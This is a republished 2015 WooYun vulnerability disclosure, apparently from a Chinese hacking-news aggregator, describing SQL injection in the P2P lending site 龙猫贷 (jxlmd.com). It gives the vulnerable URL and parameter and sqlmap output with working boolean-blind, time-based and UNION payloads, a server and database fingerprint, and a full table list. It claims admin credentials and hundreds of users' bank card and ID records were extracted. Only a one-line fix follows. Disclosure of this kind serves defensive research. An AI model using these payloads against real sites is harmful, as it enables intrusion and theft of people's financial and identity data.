记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

p2p安全之龙猫贷SQL注射(用户银行卡号等信息泄露)

2015-10-26 17:40

信息泄露...

漏洞证明:

注射点:

http://www.jxlmd.com/shownews1.php?dirid=72&newsid=144

code 区域
sqlmap identified the following injection points with a total of 54 HTTP(s) requests:

---

Parameter: newsid (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: dirid=72&newsid=144 AND 1142=1142



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: dirid=72&newsid=144 AND (SELECT * FROM (SELECT(SLEEP(5)))eWcC)



Type: UNION query

Title: Generic UNION query (NULL) - 11 columns

Payload: dirid=72&newsid=-7333 UNION ALL SELECT NULL,CONCAT(0x7171706b71,0x6d7a6b43515870546953,0x71767a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

---

web server operating system: Windows 2008 R2 or 7

web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.15

back-end DBMS: MySQL 5.0.12



code 区域
[*] information_schema

[*] lmd2014

[*] lmdlmd

[*] test

........

Database: lmd2014

[52 tables]

+---------------------+

| actionlogs |

| activity |

| admin |

| adminroles |

| area |

| article |

| assetstable |

| autotender |

| autotenderlogs |

| backinterestdetails |

| backpassword |

| banks |

| biao |

| biaopropertys |

| borrowers |

| capitalrecords |

| cashwithdrawal |

| city |

| contract |

| departments |

| dir |

| emailconfig |

| fkmessage |

| hbtype |

| hbxz |

| hitsearchs |

| htmltemplate |

| interestdetails |

| investment |

| irmf |

| lbpics |

| loanapplication |

| loginlog |

| peoplemanagement |

| prize |

| prize_zj |

| product |

| province |

| rechargerecord |

| recommendeds |

| riskreserve |

| settings |

| sysmessateusers |

| sysmssage |

| testtime |

| testupdate |

| tjmoney |

| tjmoneylist |

| torepaytheloan |

| toundertakedetails |

| userbanks |

| usercontract |

+---------------------+

.........



tables 挺多的,估计数据也不少......

管理员账号密码

admin.jpg



一些用户的银行卡号等信息.....

有好几百...

Idcard.jpg



友情检测...



修复方案:

毕竟是做P2P的,web安全也很重要

安装安全软件,过滤危险字符...

知识来源: www.wooyun.org/bugs/wooyun-2015-0139839

阅读:87957 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“p2p安全之龙猫贷SQL注射(用户银行卡号等信息泄露)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云